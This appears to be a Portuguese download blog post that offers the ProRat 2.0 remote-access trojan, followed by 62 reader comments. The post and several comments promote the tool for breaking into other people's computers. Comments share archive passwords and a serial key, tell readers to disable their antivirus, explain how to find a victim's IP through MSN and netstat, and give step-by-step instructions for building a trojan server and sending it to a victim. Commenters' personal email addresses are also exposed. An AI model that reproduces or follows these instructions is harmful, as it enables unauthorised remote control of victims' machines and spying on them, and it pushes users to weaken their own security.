abr 27

Nova versão do Prorat,um dos melhores programas para invasão.ProRat é possivel várias ações interessantes, porém a maioria das ações é contra a lei.(só baixe se você souber usá-lo).

Tamanho: 7 Mb
Hospedagem: FileBase

Free download br

Termos de Pesquisa:

proratprorat downloadbaixar proratprorat 2 0 download


62 respostas para “Prorat 2.0”

  1. reperre disse:

    vlw pelo prog

  2. PEDRO RAMOS disse:

    não consegue abrir o pro rat não abrir
    a mensagem é essa não foi possível

  3. Pignatti disse:

    naum consigo abrir o programa prorat, quando eu tento aparece uma mensagem dizendo que eu naum sou autorizado como faço para corrgir o erro
    obrigado

  4. diogo disse:

    ai queal e a senha para descompaquitar o prorat

    me manda ai no msn mega_xat@hotmail.com

  5. Brexp disse:

    É so digitar PRO

  6. Marcelo disse:

    Qdo abro pede senha, qual é a senha deste programa?
    Mande-me por e-mail e agradecerei imensamente
    poindkster@hotmail.com

  7. nelsonda costa oliveira disse:

    Qdo abro pede senha, qual é a senha deste programa?
    Mande-me por e-mail e agradecerei imensamente nelson_ipu@hotmail.com

  8. junior disse:

    qual e a senha maluko

  9. Itachi disse:

    eu baixei mais fla que tah em formato desconhecido ,o que eu faco?????

  10. gefersob disse:

    a senha mano é só (pro)
    mas aconselho o prorat1.9…
    naum muda quais nada..

  11. brow disse:

    eu axo o turkojan melhor q o prorat
    + e so uma dica se quiser test e baixar vc vão gosta
    versão atual
    atualizo pow essas semanas !
    turkojan v5

    link a baixo

    link: http://www.megaupload.com/?d=OK3HZYBM

  12. CaLS disse:

    vo test eu usava o turkojan 4

    vlw lek ele era mt bom !

  13. matheus disse:

    ai galera para poder baixar o pro rat tem q estar com o antivirus pausado!! pq se nao o antivirus detecta quepassa a mensagem para o winrar que é um virus e ele nao pode ser aberto !!
    baixem com antivirus pausado!

  14. Lucas18 disse:

    com esse progama dá pra mim rachia orkut meo?? vlw

  15. Lucas18 disse:

    com esse programa eu posso rackia orkut meo?? vlw responde lá no msn greicy.lucas@hotmail.com

  16. xzum disse:

    to querendo saber se esse download ai n vem com um trojan dentro pra me invadirem… tem alguem ai que ja baxo a mais de 1 mes e n deu nada?

  17. Marcos disse:

    Essa porra é um vírus. E não vem dize que é um vírus só pq faz trojan, pq pra min isso não cola não. Pq desativa o firewall intão? Isso dai infecta todos os programas seus (.exe).
    VAI TOMA NO CU SITINHO PORVA….

  18. Renan disse:

    Maldita inclusão digital /\ rsrsr

  19. Luis disse:

  20. joel disse:

    haeee marcos seu cabaço! como é que vc quer invadir outro pc sem usar um virus…é obvio que o prorat é um programa com um virus! mas é um virus que nao prejudica seu pc pq nao e malefico..se vc nao sabe isso acosnselho a abandonar a ideia seu mané…kkkkkkk

  21. XxXxX disse:

    Pqp noobs são foda … baixa aí memu …. dps tem q levar pra poha de uma assistência pra zerar a BIOS xD ..

  22. tiago disse:

    harquer

  23. fhixiki disse:

    mano eu baxei mais a senha nao vale me diz qual senha devo usar
    karai vay to puto da vida e meu primeiro download q nao funciono

  24. Paulo disse:

    jente eh soh pausar o desabilitar a proteção residente do seu anti-virus, pois o anti vírus o considera um adim_remote quer dizer que ele eh tipo um trojan só ki ao invés de ser conectado pelo hacker eh ele que conecta naum eh vírus soh eh reconhecido como um!(pode ser vírus se o postador do site pegou ele de qualquer lugar!! mas acho difícil)

  25. PANICO~x~panico disse:

    Essa porra é um vírus. E não vem dize que é um vírus só pq faz trojan, pq pra min isso não cola não. Pq desativa o firewall intão? Isso dai infecta todos os programas seus (.exe).

    claro seu otario é programa hacker todos vem virus para de ser noob meu amigo, e o anti-virus só detecrta virus pq o PRORAT ele faz o virus é que nem o TURKOJAN4, BINDER, CAIN, BEAST. Todos programas hacker todos vem com virus, por isso é bom vc configurar o programa pra tirar o virus sem corromper o program vlw

  26. marcos disse:

    pois tem que descompaquitar pede senha qual é

  27. bruno disse:

    acho que a senha é:*hackeronline

  28. lima disse:

    ola, consequi fazer o download, fiz o cadastro e deu tudo certo… gostaria apenas de saber se os virus sao apenas do prorat..e eu acho que mesmo se nao fo voces nao vao me dizer mas quais os virus apenas do prorat pois assim estaria ciente de algum virus adcional

  29. Kvra @ wall disse:

    gente por favo nao consigo baixa o prorat me ajuden por favo add meu msn lucaoterrorista@hotmail.cm

  30. Kvra @ wall disse:

    gente por favo nao consigo baixa o prorat me ajuden por favo add meu msn lucaoterrorista@hotmail.com

  31. O HACKER disse:

    Senha P/ Descompactar: (hackeronline) Programinha massa tem tudo, da pra invadir PC dos outros utilizando o IP, pra descobrir o ip pelo MSN é só transferir qualquer arquivo pra vitima ou ligar a cam, abrir o prompt e digitar: netstat -n vai aparecer uma porrada de IP um deles é da tua vitima, depois é colocar no prorat conectar e curtir com os outros…rsrsrsrsrsrsrs

  32. O HACKER disse:

    Senha pra descompactar: (hackeronline)
    Serial de ativação do ProRat: (66618e869accfc4f96)

  33. O HACKER disse:

    Muitoooooo bom e simplesmente o melhor que ja usei, e so criar um servidor (virus) enviar pra vitima pelo msn, fazer o trouxa executar o (virus) e vc vai ter acesso total a maquina do cara. muitooooo showwwwwww

  34. Ricardo disse:

    Ow vcs q naum sabem uzar esse programa ae e nem conhecem só querem uzar pra zua com os outros!! e pegar senhas
    CUIDADO esse programa e meio proibido é contra a lei
    se a policia consegui o IP do seu computador eles vao te localizar
    ai vcs tao ……. Pe da Vida!!!

  35. lima disse:

    bom gostaria de informar uma coisa, apos baixar coloquem o arquivo em um cd, ou pendrive, apos religar o antivirus (e ter retirado o cd ) o antivirus vai acha aguns virus pois a virus nos arquivos voce deleta pronto usa o prorat quando quise pelo cd pois o antivirus nao vai ficar te pertubando tada hora

  36. Xg.Lucas disse:

    Aeq galerinha, qnd eu clico pra baixar entra em um site pedindo o numero do meu celular, oq eu faço??

  37. admin disse:

    lá em baixo ta escrito fazer download, só clica lá

  38. Cracker disse:

    Ola pessoal para quem sabe o bom uso desse programa é usar uma outro por baixo
    use um programa virtual, e esconda seu ip com outro programa ai ta de boa

  39. Cristiano disse:

    c vcs nao saben nem ver a senha nem baixem o programa cambada d noob inutil!!

  40. Bruno Loko disse:

    *esconda seu ip com outro programa ai ta de boa*

    ai onde eu acho esse programa????????????? =P

  41. 100nacao disse:

    EI camarada si liga ,fiz tudo direitinhho mas no final no prorat special edition ta dizendo que o cod.de registro ta errado?qual foi copiei direito e o ant.ta desligado.ajuda aew fera to precisando muito!!brigadao!!fik na paz.

  42. hacker-pc disse:

    1- para vc conseguir baixar des ative seu anti virus
    2- depois quanto vc baixar descomacte
    3- va na pasta
    4- va no prorat
    5- abra
    6- faça oque quiser

  43. Bio disse:

    mas que merda kara pra que coloka senha nessas merdas, se não é spra baixar não coloca nada só trabalho e perda de tempo porra tira essas porras de senha meuuuuu

  44. daniel disse:

    manow nao to conseguindo fazer rodar o prog pode me ajudar
    ?

  45. Rone disse:

    qual a senha para descompaquitar o prorat 1.9 ou 2.0

  46. Roo disse:

    Ai, eu enviei um arquivo que não devia e agora quero aparagar do pc da pessoa pra quem eu enviei. é possivel com o ProRat? E depois, é possivel excluir o ProRat?

  47. hyago disse:

    Quando eu fizer um vírus e colocar em um pendrive e coloca e um PC qualquer! Eu poço invadir ?

  48. lucas disse:

    pra que nao sabe a senha pra descompactar… a senha é PRO!

  49. henrick disse:

    gostaria que vcs pstassem o link de download do turkojan 5, escaneei meu sistema umas 50 vezes sem parar e não encontrei nada dessas porra de virus mano, e qro enviar um pouco de veneno ao hacker q invadiu meu pc, constatei que a conexão entre o pc dele e aminha ja consegui encontar o enderço ip dele, ea nossa guerra tem que começa pra ele aprender a me respeitar, tbm sou hacker, mas de um grau mais baixo, to começando faz pouco tempo de experiencia, mas ja consigo invadir pcs!!! abraço!!

  50. Marcos 66613 disse:

    qdo ta desconhecido precisa ter o winrar ou winzip pra zipar a pasta ai abrir senha : pro,prorat,prorat1.9,”..”

  51. Study-Tecno16 disse:

    “Refeito Edição Corrigida!!!”

    Galera Quem Tah Com Dúvidas, Fiz Esse Post Para Ajudar Vocês,
    Uso Do Prorat, O Prorat é Um Programa Hacking*, Que Significa
    Ferramenta Hacker (Tecnologicamente Falando).

    Como Usar:
    1-Abra O Programa e Clique Em “Create”
    2-Então, Clique Em “Create ProRat Server ( 342 Kbayt )”
    3-Depois Clique Em “General Settings”
    4-Na Aba “Server Port: 5110 ” Deixe Como Está Porque Está É A Porta que O Programa Usará Para Invadir O Outro PC.
    5-Logo Abaixo, Se Encontra A Aba “Server Password:123456″
    Está é A Aba Onde Ficará A Senha De Acesso Ao Vírus, A Mudança é Opcional.(OBS: Mude Se Quiser, Mas Deve Lembrar A Senha Para Acessa-lo Depois Novamente).
    6-Deixe O Resto Como Está.
    7-Clique Em “Create Server” O Botão Logo Abaixo, Bem No Final.
    8-Espere o Carregamento E Aparecerá Uma Janela Com O Seguinte Aviso “The Server, has created with your settings in the current directory.”
    9-Clique Em “OK”
    10-Clique No “X” Para Fechar A Janela de Criação de Vírus.
    11-Vá Até A Pasta Do ProRat.
    12-Perceba Que Há Uma Icone Com Um Olho Feminino e O Nome Do Arquivo é “server”
    13-Não Mude O Nome.
    14-Envie Ao Amigo, Mas Saiba O IP Dele Para Poder Hackea-lo.
    15-Lá No Inicio Do Programa Existe Uma Aba Assim: “Ip:127.0.0.1″
    Lá Coloque O Ip Da Vítima Exemplo “Ip:200.149.119.147″
    E Fim.

    Qualquer Outra Dúvida Msn: felipe_phb47@hotmail.com

    Ahh E Vlw’ O Site Tah Mto Show’ Flw.
    “Conhecimento Naum Se Guarda, Se Repassa!!!”
    Fuizzz………………

  52. leonardo disse:

    quando eu baixo , vo estrair dai aparece um erro parece que o winrar bloqueia oque eu faço ?

  53. hacker041 disse:

    A senha pro ProRat 2.0 é HACKERONLINE !!!qualquer duvida é so me add no seu msn: gabriel.spengler@hotmail.com

  54. ADM.windows disse:

    Ola gente , eu sou o Gerson Alves e sou adm de umas das tec.windows .
    Queria aviza-los Para NÃO BAIXAREM esses Programas Raquers , so se você tiver EXPERIENCIA , CURSOS . Pois o Mal uso Causa Bloqueação Total na BIOS .
    Desativando o Anti-virus você podera criar um Virus e se afetar com seu Proprio Virus .
    Lembrem-se .
    Apos Download , ative o Anti-Virus e Reinicie sua maquina .
    Aperte “Delete”
    Configurações manuais da Bios . ” restaurar Segurança” e depois
    ativar flog fire .
    ESPERO TER AJUDADO .
    mais informações visite esse site – wwww.megaaulas.com.br

  55. nao te interesa disse:

    lol com ativiros pausados meu firewel pego

  56. welington disse:

    vc espera um pouco ai clica no nome em baixo donwload espera uns mintos ai v clica qd certo ok/???

  57. tiago thithithi disse:

    tem uma outra senha “pro”
    colocar quando for extrair!!

  58. caiçara disse:

    isso é tudo uma farça ja baixei instalei configurei mais na verdade não da pra fazer nada todos fala a mesma coisa vamos deixar de palhaçada ,e colocar um progama que roda de verdade ficam ai metendo a perna fala que é hacker não passam de noob cabaço quer realmete esse proga pessoal procurem um hacker de confiança que ta dificil mais vai dar certo

  59. filipepueira disse:

    eu baixei o prorat 2.0 ja testei todas as senha que eu pesquisei da uma ajudinha ai sabe qual a senha verdadeira

  60. reginaldo disse:

    muito bom mais por que isso tenho maneiras melhores de
    usar ooutras tecnicas

  61. Miguel Pinto de Moura disse:

    V.Sas não disponibilizaram o link para o download. Obrigado Mig.

  62. confidencial disse:

    cara naum baxe isso naum so um hacker mas naum vo fala meu nome naum baxe esse programa pq ele dexara seu ip abeto para otras pessoas alem disso msm o virus sendo do programa pode fazer com ki trave o pc

Regulamentos:

- Palavrões vão ser apagados;
- Spam não é publicado;
- Critícas são sempre úteis;
- Se tem dificuldades para instalação/reprodução dê o maior número possível de detalhes;
- Se algum link estiver temporariamente [não foi deletado], não posso fazer nada a respeito; É aguardar o servidor voltar a disponibilizá-lo;
- Respondo sempre q possivel os comentários no post;

Dicas:

Jogos RIP: São jogos em que são retirados os vídeos, texturas de alta definição, modo multiplayer (ou qualquer outra coisa). Tudo para dimunuir o tamanho do jogo e consequentemente os links.

Jogos Full RIP: São jogos completos, extremamente compactados.

Se ao iniciar o jogo aparecer um erro (semelhante ou igual) avisando a falta da DLL "d3dx9_33.dll", é só atualizar o Direct-X. Vá até o site da Microsoft e procure a seção de downloads.

Deixe seu Comentário




if (window.top.location!=self.location) window.top.location.href=self.location.href; if (window.parent.location!=self.location) parent.location.href=self.location.href;